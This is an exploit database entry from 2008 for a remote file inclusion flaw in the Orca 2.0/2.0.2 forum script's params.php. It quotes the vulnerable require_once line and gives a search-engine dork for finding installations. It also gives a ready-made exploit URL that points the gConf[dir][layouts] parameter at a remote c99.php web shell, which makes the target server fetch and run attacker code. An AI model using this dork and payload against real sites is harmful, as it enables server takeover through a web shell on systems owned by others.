id: 3310
date: 06/25/2008
title: Orca 2.0/2.0.2 (params.php) Remote File Inclusion Vulnerability
author: Ciph3r
cves: 

===============================================================
Orca 2.0/2.0.2 (params.php) Remote File Inclusion Vulnerability
===============================================================



#####################################################################
#
# Orca - Interactive Forum Script Remote File Inclusion Vulnerability
#
#####################################################################
#
# Discovered by : Ciph3r
#
#
# SP tanx4: Iranian hacker & Kurdish security TEAM
# 
# CMS download : http://sourceforge.net/project/platformdownload.php?group_id=183624    
#
# class : remote
#
# risk : high
#
# Dork : "Powered by Orca Interactive Forum Script"
#
#######################################################################
#
# C0de : 
#
#               
#    require_once ($gConf['dir']['layouts'] . 'base/params.php');
#
#
#######################################################################

 EXPLOIT :

 

 http://127.0.0.1/cms/Orca-2.0.beta2/layout/default/params.php?gConf[dir][layouts]=http://127.0.0.1/c99.php?


#######################################################################



#  0day.today [2023-03-23]  #